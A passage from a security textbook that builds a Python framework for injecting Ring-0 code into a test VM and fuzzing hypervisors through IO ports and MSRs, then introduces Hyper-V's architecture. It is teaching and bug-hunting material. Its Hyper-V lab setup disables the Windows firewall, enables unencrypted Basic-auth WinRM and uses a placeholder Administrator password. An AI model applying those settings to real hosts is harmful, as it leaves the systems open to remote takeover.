                  'tail' / c.If(c.this.head != None, c.LazyBound(lambda: List))
              )
              CompAlist = [❶
                  (TP.Array, ArrayAdapter(❷
                      c.Struct(
                          'count' / c.Int32ul,
                          'subtype'/ c.Select(*(c.Const(x, TP) for x in IntPrefixes)),
                          'v'      / c.Array(
                              c.this.count, c.Switch(c.this.subtype, dict(IntAlist)))))),
                  (TP.CString, c.CString('ascii')),❹
                  (TP.List, ListAdapter(List)),❺
                  (TP.Nil, c.Computed(None))
              ]
              PythonObj = IntFixed + (tuple, str, list, type(None))
              Prefixes = IntPrefixes + (TP.Array, TP.CString, TP.List, TP.Nil)

              class BodyAdapter(c.Adapter):❾
                  def _decode(self, obj, context, path):
                      return obj.value

                     def _encode(self, obj, context, path):
                         return {
                             'prefix': dict(zip(PythonObj, Prefixes))[type(obj)],
                             'value': obj
                                                                       Chapter 24: Creating a Research Framework
         }

Body = BodyAdapter(❼
    c.Struct(
        'prefix' / TP,
        'value' / c.Switch(c.this.prefix, dict(IntAlist + CompAlist)))
)

   We start with CompAlist ❶, an associative list of the TP values representing com-
pound types and their respective constructs.
   The first element of this list is the array type ❷, where we define the construct for the
Array_t header, followed by a “v” field for holding the array elements. The construct is
wrapped by ArrayAdapter ❸, which converts the resulting object into a Python tuple.
   The next element is the string type ❹, which is associated directly to the CString
construct.
   Finally, we have the list type ❺. In this case, we bind the construct to the List ❻ sym-
bol so we can refer to it recursively. We can see that the construct also refers to a symbol
called Body ❼, which we haven’t defined yet. To make it possible to work with forward
declarations, we use LazyBound. The construct is wrapped by ListAdapter ❽ to convert
the resulting object into a Python list.
   Body parses a TP prefix and looks for its associated construct in both IntAlist and
CompAlist. This construct can parse (or build) any TP value, so we refer to it when pars-
ing list elements but also to parse a message’s body. We wrap it with BodyAdapter ❾ to
remove the now redundant TP prefix when converting the object to a Python collection.
   To complete the implementation, we need a construct for whole messages:
Message = c.Struct(❶
    'header'         / MsgHdr,
    'body'           / c.RawCopy(Body),

                                                                                                                   PART V
    '_body_checksum' / c.Pointer(❷
        c.this.header.hdr.value._csum_offset,
        c.Checksum(c.Int32ul, crc32c, c.this.body.data)
    )
)
def recv(reader):❸
    hdr = reader.read(MsgHdr.sizeof())
    body = reader.read(MsgHdr.parse(hdr).hdr.value.len)
    msg = Message.parse(hdr + body)
    return (msg.header.hdr.value.type, msg.body.value)

def send(writer, body):❹
    body = Body.build(body)
    header = MsgHdr.build({
        'hdr': {
            'value': {
                'type': MT.Request,
                'len': len(body),
                'checksum': crc32c(body)
            }
        }
    })
    writer.write(header + body)
    writer.flush()
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Message ❶ combines the MsgHdr and Body constructs, and it calculates the
              CRC32-C of the latter, which is applied to the checksum field in the header. This is
              achieved by passing the value from _csum_offset to Pointer ❷.
                 The final interface is exposed through the recv ❸ and send ❹ functions. Given a
              reader object, recv deserializes a message, returning a tuple with the message’s type and
              body. In the case of send, it takes a writer object and the request’s body (as a standard
              Python collection), serializes the message, and writes it to the object.

              Lab 24-3: Running the Guest (Python)

              In this section, we will write a Python class to abstract the process of launching a VM
              instance and receiving messages from the serial port. Later in this chapter, we will extend
              it to provide code injection capabilities.
              # guest.py
              from subprocess import Popen, PIPE
              import protocol
              class Guest:❶
                  def __init__(self):
                      self.proc = None

                     def __enter__(self):
                         self.proc = Popen(
                             ('exec qemu-system-x86_64 -display none -boot d '
                              '-cdrom kernel_bios.iso -m 300M -serial stdio -enable-kvm'),
                              stdout=PIPE, stdin=PIPE, shell=True
                         )
                         return self

                     def __exit__(self, type, value, traceback):
                         self.proc.kill()

                     def messages(self):❷
                         while self.proc.returncode is None:
                             yield protocol.recv(self.proc.stdout)

                Guest ❶ is a context manager where the resource we manage is a VM instance.
              Currently, we use QEMU/KVM, but we could subclass it to work with other targets.
              The messages ❷ generator receives and parses incoming messages sent by the kernel.
                Let’s write a simple test script to launch the VM and print the messages we receive:
              # main.py
              from guest import Guest
              with Guest() as g:
                  for msg in g.messages():
                      print(msg)

                  The script, produces the following output:
              ┌──(root ghh6)-[/labs/lab3]
              └─# python3 main.py
              (EnumIntegerString.new(3, 'OOB'), [UInt32(0), 'kmain at 0x%016lx',
              UInt64(4199195)])
              (EnumIntegerString.new(0, 'Boot'), [['symbols', [
              ['__ehdr_start', UInt64(4194304)], ['_end', UInt64(16838728)],
                                                                      Chapter 24: Creating a Research Framework
['put_va', UInt64(4204780)], ['send_msg', UInt64(4205194)]]],
['mmap', [[['address', UInt64(0)], ['length', UInt64(654336)],
['type', UInt32(1)]], [['address', UInt64(654336)],
['length', UInt64(1024)], ['type', UInt32(2)]],
…

  We can observe an OOB message, followed by the boot message containing symbols
and address space information. In the next section, we will handle those messages and
implement the requests to execute arbitrary code in the guest.

Lab 24-4: Code Injection (Python)

Before making the necessary changes to the Guest class, we will need a couple of auxiliary
classes:

   • RemoteMemory The purpose of this class is to provide an alloc/free interface
     to the guest’s memory. It will get instanced from the memory-map information
     of boot messages.
   • Code This class abstracts the assembler invocation to produce binary code from
     a string containing assembly.

# remotemem.py
import portion as P
class RemoteMemoryError(Exception):
    pass

                                                                                                                  PART V
class RemoteMemory:
    def __init__(self):
        self.mem = P.empty()
        self.allocations = dict()

    def add_region(self, base, size):❶
        interval = P.openclosed(base, base + size)
        self.mem |= interval
        return interval

    def del_region(self, base, size):❷
        interval = P.openclosed(base, base + size)
        self.mem -= interval
        return interval

    def alloc(self, size):❸
        for interval in self.mem:
            if interval.upper - interval.lower >= size:
                allocation = self.del_region(interval.lower, size)
                self.allocations[allocation.lower] = allocation
                return allocation.lower
        raise RemoteMemoryError('out of memory')

    def free(self, address):
        self.mem |= self.allocations[address]
        del self.allocations[address]
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 We based our RemoteMemory implementation in the portion9 module. The
              add_region ❶ and del_region ❷ methods will be used exclusively at the initialization
              stage. Once the object is fully initialized, memory can be requested via alloc ❸, employ-
              ing an embarrassingly inefficient allocation strategy, but it will be enough for our needs.
              # code.py
              import os
              from subprocess import run
              from tempfile import NamedTemporaryFile
              class Code:
                  def __init__(self, code, sym):❶
                      self.code = '[bits 64]\n'
                      self.code += '\n'.join(f'{k} equ {v:#x}' for (k, v) in sym.items())
                      self.code += '\n%include "macros.asm"\n' + code

                     def build(self, base_address):❷
                         with NamedTemporaryFile('w') as f:
                             f.write(f'[org {base_address:#x}]\n' + self.code)
                             f.flush()
                             run(f'nasm -fbin -o {f.name}.bin {f.name}', shell=True)
                             with open(f'{f.name}.bin', 'rb') as fout:
                                 ret = fout.read()
                             os.remove(f'{f.name}.bin')
                         return ret

                 Code ❶ is instantiated from a string of assembly code and a dictionary of symbols.
              These symbol definitions are prepended to the assembly code together with an “include
              macros.asm” directive, where we can add our custom macros. The only method of this
              class is build ❷, which invokes the assembler and compiles the code at the specified base
              address, returning the resulting binary.
                 Now we can proceed with the Guest class modifications:
              # guest.py
              import subprocess
              import protocol
              from enum import Enum
              from remotemem import RemoteMemory

              class OpType(Enum):
                  Write = 0
                  Exec = 1

              class Guest:
              … omitted for brevity …
                  def _init_boot_info(self, symbols, mmap):❶
                      self.symbols = dict(symbols)
                      self.memory = RemoteMemory()
                      for entry in map(dict, mmap):
                          if entry['type'] == 1: # MULTIBOOT_MEMORY_AVAILABLE
                              self.memory.add_region(entry['address'], entry['length'])
                      kernel_end = (self.symbols['_end'] + 0x1000) & ~0xfff
                      self.memory.del_region(0, kernel_end)

                     def messages(self):
                         while self.proc.returncode is None:
                             msg = protocol.recv(self.proc.stdout)
                                                                    Chapter 24: Creating a Research Framework
             msg_type, body = msg
             if msg_type == protocol.MT.Boot:
                 self._init_boot_info(**dict(body))
             yield msg

    def op_write(self, code, address=None):❷
        if address is None:
            address = self.memory.alloc(len(code.build(0)))
        self._request += [
            protocol.f.UInt32(OpType.Write.value),
            protocol.f.UInt64(address),
            tuple(protocol.f.UInt8(x) for x in code.build(address))
        ]
        return address

    def op_exec(self, address):❸
        self._request += [
            protocol.f.UInt32(OpType.Exec.value),
            protocol.f.UInt64(address)
        ]

    def op_commit(self):❹
        protocol.send(self.proc.stdin, self._request)
        self._request.clear()

    def execute(self, code):❺
        address = self.op_write(code)
        self.op_exec(address)
        self.op_commit()
        self.memory.free(address)

   The first change is in the messages method, so now we call _init_boot_info ❶ when
a boot message arrives, to initialize two properties: symbols and memory (an instance
of RemoteMemory).

                                                                                                                PART V
   Address ranges describing regions of available memory are added to the memory
object, and the range of address zero to the end of the kernel is removed from available
memory.
   New methods were implemented to build the operations that compose a request
message:

   • op_write ❷ Takes a Code instance (and optionally a base address), builds the
     code, and encodes the resulting binary in a write operation, which is then added
     to the request’s operations list.
   • op_exec ❸ Takes an address and encodes it in an execute operation, adding it
     to the operations list.
   • op_commit ❹ Takes the contents from the operations list to build and send a
     request message.
   These methods provide a low-level API, but we implemented an execute ❺ method
for the most common use case, only requiring a Code instance.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  Let’s test this new functionality by executing some code in the guest:
              # main.py
              import protocol
              from guest import Guest
              from code import Code
              from enum import Enum

              class OOBType(Enum):
                  Print = 0

              with Guest() as g:
                  for (msg_type, body) in g.messages():
                      if msg_type == protocol.MT.OOB:
                          oob_type, *msg = body
                          if oob_type == OOBType.Print.value:
                              fmt, *args = msg
                              print(f'PRINT: {fmt % tuple(args)}')
                      if msg_type == protocol.MT.Boot:
                          print('BOOTED')
                          g.execute(Code("""
                                  OOB_PRINT "hello world!"
                                  REPLY_EMPTY
                                  ret""", g.symbols))❶
                      if msg_type == protocol.MT.Reply:
                          print(f'REPLY: {body}')

                 When a boot message arrives, the script injects a snippet of code into the guest to send
              a “hello world!” message ❶.

                                 NOTE The OOB_PRINT and REPLY_EMPTY macros are defined in
                                 the “macros.asm” file, which was omitted from the code listings for
                                 brevity reasons.
                                 ┌──(root ghh6)-[/labs/lab4]
                                 └─# python3 main.py
                                 PRINT: kmain at 0x000000000040131b
                                 BOOTED
                                 PRINT: hello world!
                                 REPLY: []

                We can see a “hello world!” message and an empty reply produced by the injected
              code!

              Fuzzing
              With our current framework, we are now able to launch a VM and execute arbitrary
              code at Ring-0. All this from just a few Python lines. Now we are going to use it to fuzz
              hypervisors!
                                                                       Chapter 24: Creating a Research Framework
The Fuzzer Base Class
Writing fuzzers involves some repetitive tasks that we can abstract into a base class:
# fuzzer.py
import random
import signal
import protocol
from enum import Enum
from guest import Guest
from code import Code

class OOBType(Enum):
    Print = 0
    Assert = 1

class Fuzzer:
    regs = ('rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi', 'rbp', 'rsp',
            'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15')
    def __init__(self, seed):❶
        self.rand = random.Random(seed)
        signal.signal(signal.SIGALRM, Fuzzer.timeout_handler)

    @staticmethod
    def timeout_handler(signum, frame):
        raise Exception('TIMEOUT')

    def context_save(self):
        return 'pop rax\n' + '\n'.join(
            f'mov qword [{self.context_area + n*8:#x}], {reg}'
            for (n, reg) in enumerate(self.regs)) + '\n'

    def context_restore(self):
        return '\n'.join(

                                                                                                                   PART V
            f'mov {reg}, qword [{self.context_area + n*8:#x}]'
            for (n, reg) in enumerate(self.regs)) + '\njmp rax\n'

    def code(self, code):
        return Code(code, self.guest.symbols)

    def fuzz(self, reply):❸
        raise NotImplementedError

    def on_boot(self, body):❹
        self.fuzz([])

    def handle_message(self, msg_type, body):
        if msg_type == protocol.MT.OOB:
…omitted for brevity…
        else:
            if msg_type == protocol.MT.Boot:
                self.context_area = self.guest.memory.alloc(0x1000)
                self.on_boot(body)
            else:
                self.fuzz(body)

    def run(self):❷
        while True:
            try:
Gray Hat Hacking: The Ethical Hacker’s Handbook
                                      with Guest() as self.guest:
                                          for msg in self.guest.messages():
                                              signal.alarm(0)
                                              signal.alarm(2)
                                              self.handle_message(*msg)
                                  except Exception as e:
                                      print(f'exception: {e}')

                 Fuzzer (or any derived class) objects are instantiated ❶ from a seed value used to
              initialize the fuzzer’s pseudo-random state. The actual fuzzing is performed by the run ❷
              method, which launches the guest and handles incoming messages. The message process-
              ing loop sets an alarm, so if the fuzzer gets stuck for a few seconds, an exception is raised
              and the fuzzer restarts with a new guest.
                 Reply messages are dispatched to the fuzz ❸ method, which needs to be implemented
              by subclasses. Incoming boot messages can be handled by subclasses, which overload
              on_boot ❹. When on_boot is not overloaded this method just calls fuzz, passing an
              empty body.
                 Finally, we have a few convenient methods for code generation (code, context_save,
              and context_restore).

              Lab 24-5: IO-Ports Fuzzer

              Time to write our first fuzzer! The goal here is to learn how the different pieces of the
              framework fit together. So, in this case, we will focus on simplicity over usefulness.
                 This fuzzer will be a naive random IN/OUT instruction generator:
              # port_fuzzer.py
              import sys
              import fuzzer
              from code import Code

              class Fuzzer(fuzzer.Fuzzer):
                  def __init__(self, seed):
                      super().__init__(seed)
                      self.discovered_ports = []❶
                      self.blacklisted_ports = list(range(0x3f8, 0x3f8 + 5))❷

                     def fuzz(self, reply):
                         if reply:
                             port, value = reply
                             if value != (1 << value.width) - 1 \❸
                                 and port not in self.discovered_ports:
                                 print(f'New port: {port:04x} -> {value:08x}')
                                 self.discovered_ports.append(port)
                         size = self.rand.choice((8, 16, 32))
                         reg = {8: 'al', 16: 'ax', 32: 'eax'}[size]
                         port = self.blacklisted_ports[0]
                         while port in self.blacklisted_ports:
                             if not self.discovered_ports or self.rand.choice((True, False)):
                                 port = self.rand.randint(0, 0xffff)❹
                             else:
                                 port = self.rand.choice(self.discovered_ports)❺
                         op = self.rand.choice((
                             f"""mov dx, {port:#x}
                                                                        Chapter 24: Creating a Research Framework
                 in {reg}, dx
                 PUT_VA UInt16, rdx, UInt{size}, rax❻
                 REPLY
              """,
             f"""mov dx, {port:#x}
                 mov {reg}, {self.rand.randint(0, (1 << size) - 1):#x}❼
                 out dx, {reg}
                 REPLY_EMPTY
             """))
         code = self.code(self.context_save() + op + self.context_restore())
         self.guest.execute(code)

if __name__ == "__main__":
    Fuzzer(int(sys.argv[1])).run()

   Two properties are added to this new Fuzzer subclass: a list of discovered ports ❶
(empty initially) and a blacklist ❷ that was initialized with the ports used by the serial so
that we can avoid messing with protocol transport.
   The first thing that fuzz does is to check whether the reply of the last iteration
contains data resulting from the previous execution of an IN instruction. If this data
doesn’t have all its bits set ❸, it means we read a valid port, so we add it to the list of
discovered ports.
   Target ports are randomly generated 16-bit integers ❹ or are taken from the elements
of the discovered ports list ❺, but they must not be present in the blacklist.
   IN or OUT instructions are chosen randomly. IN contains extra code to send a reply,
including the port number and the value of the destination operand ❻. OUT takes a
random value ❼ in its source operand and sends back an empty reply.
   The fuzzer is invoked, passing a seed value argument:
┌──(root ghh6)-[/labs/lab5]

                                                                                                                    PART V
└─# python3 port_fuzzer.py 12345
PRINT: kmain at 0x00000000004012fa
New port: 0718 -> 00000000
New port: 0707 -> 00000000
New port: 00dd -> 00000000
New port: 072d -> 00000000
…

Lab 24-6: MSR Fuzzer

The previous fuzzer made a good learning example, but we can’t expect much from
it. Now we are going to continue with a slightly more advanced one. This next fuzzer
will generate random RDMSR/WRMSR instructions to fuzz model-specific registers.
Although this is still a super-simple fuzzer, a similar one was able to find real bugs like
CVE-2020-0751.10
# msr_fuzzer.py
import sys
import fuzzer
from code import Code
Gray Hat Hacking: The Ethical Hacker’s Handbook
              msrs = (❶
                0x00, 0x01, 0x10, 0x17, 0x1b, 0x20, 0x21, 0x28, 0x29, 0x2a, 0x2c, 0x34,
              … omitted for brevity …
                0xc0011039, 0xc001103a, 0xc001103b, 0xc001103d
              )
              def ROR(x, n, bits):
                  return (x >> n) | ((x & ((2**n) - 1)) << (bits - n))

              class Fuzzer(fuzzer.Fuzzer):
                  def __init__(self, seed):
                      super().__init__(seed)
                      self.discovered_msrs = dict()❸

                     def flip_bits(self, data, bits):❻
                         bitlens = zip(*((x, (bits-x) ** 6) for x in range(1, bits)))
                         mask = self.rand.getrandbits(self.rand.choices(*bitlens)[0])
                         return data ^ ROR(mask, self.rand.randint(0, bits), bits)

                     def fuzz(self, reply):
                         if reply:
                             msr, rdx, rax = reply
                             if msr not in self.discovered_msrs.keys():
                                  print(f'New MSR:{msr:08x} -> rdx:{rdx:016x} rax:{rax:016x}')
                             self.discovered_msrs[msr] = (rdx, rax)
                         rdx = self.rand.randint(0, (1 << 64) - 1)
                         rax = self.rand.randint(0, (1 << 64) - 1)
                         if not self.discovered_msrs or self.rand.choice((True, False)):
                             rcx = self.rand.choice(msrs)
                         else:
                             rcx = self.rand.choice(list(self.discovered_msrs.keys()))
                             if self.rand.choice((True, False)):
                                  rdx, rax = self.discovered_msrs[rcx]❹
                                  rdx = self.flip_bits(rdx, 64)
                                  rax = self.flip_bits(rax, 64)
                         if self.rand.choice((True, False)):
                             rcx = self.flip_bits(rcx, 32)❷
                         op = self.rand.choice((
                             f"""mov rcx, {rcx:#x}
                                  rdmsr
                                  PUT_VA UInt32, rcx, UInt64, rdx, UInt64, rax
                                  REPLY
                             """,
                             f"""mov rcx, {rcx:#x}
                                  mov rax, {rax:#x}
                                  mov rdx, {rdx:#x}
                                  wrmsr
                                  PUT_VA UInt32, rcx, UInt64, rdx, UInt64, rax❺
                                  REPLY
                               """))
                         code = self.code(self.context_save() + op + self.context_restore())
                         self.guest.execute(code)

              if __name__ == "__main__":
                  Fuzzer(int(sys.argv[1])).run()

                  This time, instead of generating an MSR from random integers, we use a hardcoded
              list of msrs ❶. Even if this list is not exhaustive (for example, we lack synthetic MSRs
              that are hypervisor specific), we allow the fuzzer to mutate ❷ the list elements, so eventu-
              ally it will discover new MSRs.
                                                                       Chapter 24: Creating a Research Framework
   Discovered MSRs are stored in a dictionary ❸, so not just the MSR is saved, but also
the content that was read or written. This way, previous content can be included in the
fuzzing corpus ❹ of following iterations. The contents of WRMSR operations are sent,
too ❺, since this means the execution of the instruction didn’t cause an exception.
   The flip_bits ❻ method was implemented to perform data mutation. It takes two
arguments: the data to mutate (in the form of an integer) and a size in bits. A bit-length
in the range of 1 to the size argument is randomly selected, giving higher probability to
small sizes. This bit-length is used to generate a random bitmask that is XORed against
the data.
   Let’s run the fuzzer and see what happens:
┌──(root ghh6)-[/labs/lab6]
└─# python3 msr_fuzzer.py 12345
PRINT: kmain at 0x00000000004012fa
PRINT: kmain at 0x00000000004012fa
PRINT: kmain at 0x00000000004012fa
PRINT: kmain at 0x00000000004012fa
PRINT: kmain at 0x00000000004012fa
…

   An annoying number of reboots can be observed; these slow down the fuzzing process
considerably. The reason is that we haven’t implemented any exception-handling mecha-
nism, so we will discuss this issue in the next section.

Lab 24-7: Exception Handling

                                                                                                                   PART V
Implementing exception handling directly in the kernel has a limiting factor: we can’t
anticipate what every different fuzzer will do in order to recover from it. We should
aim for a more flexible solution, so why not let each fuzzer set its own exception han-
dler instead?
    While each fuzzer can implement a recovery strategy that is optimal to its own speci-
ficities, it is nice to have a default set of handlers that are able to recover from simple
cases, so all fuzzers can benefit from it.
# fuzzer.py
class Fuzzer:
… omitted for brevity…
    def on_boot(self, body):
        self.install_idt()
        self.fuzz([])

    def install_idt(self, vectors=30):❶
        entries = (f'{l:#x}, {h:#x}'
            for l, h in map(self.make_vector_handler, range(vectors)))
        self.guest.op_exec(
            self.guest.op_write(
               self.code(f"""lidt [idtr]
                             ret
                             align 16
                             idtr:
Gray Hat Hacking: The Ethical Hacker’s Handbook
                                                  dw idt_end - idt - 1 ; IDT limit
                                                  dq idt               ; IDT base
                                                  align 16
                                                  idt: dq {', '.join(entries)}❸
                                                  idt_end:
                                                  """)))

                     def make_vector_handler(self, vec):❷
                         err_code = ''
                         code = 'REPLY_EMPTY\n' + self.context_restore()❻
                         …omitted for brevity…
                         address = self.guest.op_write(self.code(err_code + code))❹
                         return ((address & 0xffff) | 0x80000 | (
                             ((address & 0xffff << 16) | 0x8f << 8) << 32), address >> 32)❺

                 We extend the Fuzzer class to add generic exception handling. In on_boot, a call to
              install_idt ❶ is added to inject the exception handlers and set up a new guest’s IDT.
                 The install_idt method takes a number of vectors (30 by default) and calls
              make_vector_handler ❷ for each value in the range of 0 to the number of vectors. Entries
              returned by make_vector_handler are used by install_idt to produce a new IDT ❸.
                 The make_vector_handler method generates the assembly code to handle the speci-
              fied vector number and injects it into the guest ❹, but it does not execute it. Then it
              returns an IDT entry pointing to the handler ❺. By default, the code produced by
              make_vector_handler just sends an empty reply and restores the previous context state ❻.
                 Without further modifications, we can test the previous MSR fuzzer again:
              ┌──(root ghh6)-[/labs/lab7]
              └─# python3 msr_fuzzer.py 12345
              PRINT: kmain at 0x00000000004012fa
              New MSR:c0010112 -> rdx:0000000000000000 rax:0000000000000000
              New MSR:000006e0 -> rdx:0000000000000000 rax:0000000000000000
              New MSR:00000187 -> rdx:8f492c25eb147d31 rax:2220718fc8f548aa
              New MSR:00000258 -> rdx:0000000006060606 rax:0000000006060606
              …

                  We can see that the number of reboots has decreased, thus improving fuzzing speed.

              Fuzzing Tips and Improvements
              Many topics we could have discussed were left out of this chapter, so before closing up,
              let’s look at some ideas you can attempt to implement on your own.
                  We implemented two very simple fuzzers, but the framework we built allows us to do
              way more than that. Use the list of VM-Exit reasons at the beginning of this chapter as
              inspiration to write your own fuzzers, paying special attention to exit-reasons 48 and 49,
              which are used, among many other things, for memory-mapped I/O (MMIO) emulation.
                  The serial port is great for testing and learning, since it is widely available and easy
              to work with, but it is too slow for fuzzing. You might be asking yourself, why is it slow
              if it is virtualized and there aren’t physical limitations involved? The reason is that for
              each byte of data we transfer, we cause one VM-Exit, and we need to wait for a context
              switch from the hypervisor to its user mode worker process. To get decent fuzzing speeds,
              it should be replaced by a paravirtualized device that does data transfer over a shared-
              memory ring buffer.
                                                                      Chapter 24: Creating a Research Framework
   A custom bootloader can replace GRUB to achieve faster boot times—or better, the
boot process could be completely bypassed if the target hypervisor supports direct kernel
boot (for example, PVH11).
   There are many ways in which the kernel can be made more resilient; for example,
some simple measures would be marking the kernel pages as read-only and using custom
stacks for exception handlers (IST12).
   Finally, in our current implementation, the client runs in the same environment as
the target. The ideal is to turn the Guest class into a server (running in the target) and
run the client (fuzzer) in a different machine. This way, we can prevent losing the fuzzer
state if the host crashes.

Summary
This chapter started discussing the hypervisor’s attack surface, describing how differ-
ent functionality converges in a single entry point (the VM-Exit handler) and how we
can trigger many of the exposed execution paths by issuing specific instructions (mostly
privileged) from the guest. From there, we designed and implemented a framework that
allowed us to do it easily from Python. Then we used this framework to implement a
couple of simple fuzzers. To close the chapter, a few recommendations were given on how
to use and improve this framework.

References
   1. “Fuzzing para-virtualized devices in Hyper-V,” msrc-blog.microsoft.com/2019/01/28/
      fuzzing-para-virtualized-devices-in-hyper-v/.

                                                                                                                  PART V
   2. “Virtual I/O Device (VIRTIO) Version 1.1, Committee Specification,” docs
      .oasis-open.org/virtio/virtio/v1.1/csprd01/virtio-v1.1-csprd01.html.
   3. “Unikernel,” en.wikipedia.org/wiki/Unikernel.
   4. “Invoking grub-mkrescue,” www.gnu.org/software/grub/manual/grub/html_
      node/Invoking-grub_002dmkrescue.html.
   5. “Multiboot2 Specification,” www.gnu.org/software/grub/manual/multiboot2/
      multiboot.html.
   6. “Construct,” construct.readthedocs.io.
   7. “fixedint,” pypi.org/project/fixedint/.
   8. “crc32c,” pypi.org/project/crc32c/.
   9. “portion,” pypi.org/project/portion/.
  10. “CVE-2020-0751,” labs.bluefrostsecurity.de/advisories/bfs-sa-2020-001/.
  11. “PVH,” xenbits.xen.org/docs/4.6-testing/misc/pvh.html.
  12. “Intel 64 and IA-32 Architectures Software Developer’s Manual, Volume 3:
      System Programming Guide,” software.intel.com/content/dam/develop/external/
      us/en/documents-tps/325384-sdm-vol-3abcd.pdf.
This page intentionally left blank
   Inside Hyper-V
                                                                                CHAPTER

                                                                                            25
   In this chapter, we cover the following topics:
       • Hyper-V’s architecture overview
       • Synthetic interfaces: MSRs, SynIC, hypercalls
       • VMBus communication

Microsoft Hyper-V has become an attractive target for security researchers. This
hypervisor is not just used to run critical cloud infrastructure like Azure, but it is also the
backbone of security features of the Windows OS, including Hypervisor-Protected Code
Integrity (HVCI),1 Credential Guard,2 and Application Guard.3 It’s not surprising that
Microsoft has special interest in securing Hyper-V, which is the reason why its Hyper-V
bug bounty4 program awards researchers with amounts as much as US$250,000.
   Hyper-V can be a challenging target for newcomers; this chapter serves as an
introduction, giving you an overview of its architecture and covering some of its
paravirtualization interface (focusing on inter-partition communication). An in-depth
discussion of Hyper-V in a single chapter is not possible; that said, the concepts discussed
here should give you the orientation you need to conduct your own research.

             NOTE The requisites to understand this chapter are the same as in the
             previous one. Be sure you have read the previous chapter and are familiar
             with the framework developed in it because we will use it in this chapter.

Environment Setup
Before we start, we need to set up a Hyper-V system where we will conduct our testing.
Hyper-V is available in 64-bit systems since Windows 8 and Windows Server 2008 and
requires hardware-assisted virtualization with Intel VT-x or AMD-V (ARM64 is also
supported, but it won’t be covered here). We assume that our host is running Windows
10 Pro (x64) on a 64-bit Intel CPU with VT-x support. Before we start using Hyper-V,
we must enable it, which can be done from PowerShell (as Administrator):
PS C:\WINDOWS\system32> Enable-WindowsOptionalFeature -Online -FeatureName
Microsoft-Hyper-V -All
Do you want to restart the computer to complete this operation now?
[Y] Yes [N] No [?] Help (default is "Y"):

Gray Hat Hacking: The Ethical Hacker’s Handbook
                                 CAUTION Hyper-V is not available in Windows Home; you must use the Pro,
                                 Enterprise, or Education edition.

                 Now reboot the machine to boot Hyper-V.
                 To test Hyper-V, we will use tools based on the hypervisor research framework
              we developed in Chapter 24. We assume these tools will run in a second “client”
              box connected to the same network as the Hyper-V box we just set up (the “target”
              box). This “client” box can be another physical or virtual machine, but it should have
              working Linux and Docker installations. On this second box, clone the code and tools
              from GitHub:
              $ git clone https://github.com/GrayHatHacking/GHHv6.git

                 Once we grab the code, and before we build the Docker container, we need to edit
              the first lines of the file GHHv6/ch25/labs/hyperv_guest.py. This file contains the infor-
              mation needed to connect to our “target” box, copy files to it, configure and start VMs:
              host = 'hyperv_box'
              proxy_port = 2345
              user = 'Administrator'
              password = 'password123'
              deploy = True

                 Replace hyperv_box with the domain name or IP address of the Hyper-V box, and
              replace password123 with the password currently assigned to the Administrator account
              of the Hyper-V box.

                                 TIP A few files have to be copied over to the Hyper-V box. By default, the
                                 hyperv_guest.py script always does this copy, but it is only needed once.
                                 To speed up things, after the files have been copied the first time, this
                                 behavior can be disabled by setting the deploy variable to False.

                  Now we can create the Docker image and run it (from GHHv6/ch25/):
              $ docker build -t kali .
              $ docker run --network host -it kali bash

                We will disable the Windows firewall and grant remote PowerShell access to the
              Hyper-V box by running the following commands as Administrator:
              PS C:\WINDOWS\system32> Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
              PS C:\WINDOWS\system32> Enable-PSRemoting -Force
              ...omitted for brevity...
              Configured LocalAccountTokenFilterPolicy to grant administrative rights remotely to local users.
              PS C:\WINDOWS\system32> winrm set winrm/config/service '@{AllowUnencrypted="true"}'
              ...omitted for brevity...
              PS C:\WINDOWS\system32> winrm set winrm/config/service/auth '@{Basic="true"}'
              ...omitted for brevity...
              PS C:\WINDOWS\system32> Get-LocalUser -Name "Administrator" | Enable-LocalUser
                                                                                   Chapter 25: Inside Hyper-V
             CAUTION We assume the system we are working with is on a private
             network. Do not set this configuration on an Internet-facing system
             since it is risky!

Hyper-V Architecture
Hyper-V is a Type-1 hypervisor, which means there is a non-hosted VMM module
interacting directly with the hardware. On Intel-based systems, this module is called
hvix64.exe, and on AMD-based systems, this module is called hvax64.exe. During the
boot process, the Windows loader (winload) loads the Hyper-V loader (hvloader), which
in turn loads the VMM module (hvix64 or hvax64). When the VMM starts, it creates a
“root partition” running a Windows OS containing the rest of the virtualization stack.
The root partition is a privileged partition with access to most hardware devices; access
is not total, though, since the root partition shouldn’t be capable of compromising the
VMM integrity.

             NOTE The OS running in the root partition is Windows; however, there is
             ongoing work to support Linux-based root partitions.

   The logical unit of isolation in Hyper-V is called a “partition,” which is conceptually
similar to a VM. As we will see later, there are some differences because partitions can
provide another layer of isolation called Virtual Trust Levels (VTLs).
   To run unprivileged VMs, the root partition creates children partitions and assigns
resources to them. The VMM provides a set of hypercalls for this purpose that require a

                                                                                                                PART V
special set of privileges (granted to the root partition) to succeed. Another set of hyper-
calls is used by the root partition to register “intercepts,” so the root partition can be
notified by the VMM on specific events caused by the children. The root partition can
propagate these notifications to less-privileged components that perform certain virtual-
ization tasks (like hardware-devices emulation).

Hyper-V Components
It is wise to spread certain virtualization tasks across different components according
to their complexity and service time requirements. In this tier, the VMM is both the
most privileged and most responsive component. For this reason, tasks performed by the
VMM should be limited to those that are either simple or require high responsiveness.
   In general, the VMM takes care of handling privileged CPU instructions and sim-
ple devices (like timers and the interrupt controller), whereas slower or more complex
devices are emulated by a “worker process.” Between these two extremes, we can find the
Virtualization Service Providers, which are kernel drivers providing support for paravir-
tualized devices.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 We already mentioned the VMM module, so let’s see what other components are part
              of the virtualization stack.

              The Worker Process
              The Virtual Machine Worker Process (vmwp.exe) is a user-mode process that runs in
              the root partition and handles certain virtualization tasks, including device emulation.
              Device emulation provides a vast attack surface; to give you an idea, an x86/x86_64
              emulator is needed to handle memory-mapped I/O (MMIO) accesses.
                 For each VM that is launched, a worker process is started in a dedicated user, isolated
              from the worker processes of other partitions or other processes running in the root parti-
              tion. In case an attacker successfully exploits a vulnerability in the worker process, it will
              end in a user-constrained environment.

                                 NOTE The VMM also includes an x86/x86_64 emulator to handle accesses
                                 to the LAPIC (Local Advanced Programmable Interrupt Controller) page, but
                                 its implementation is minimal compared to the one in the worker process,
                                 supporting only a tiny subset of the x86/x86_64 instruction set. Interestingly
                                 enough, bugs have been found in it.5

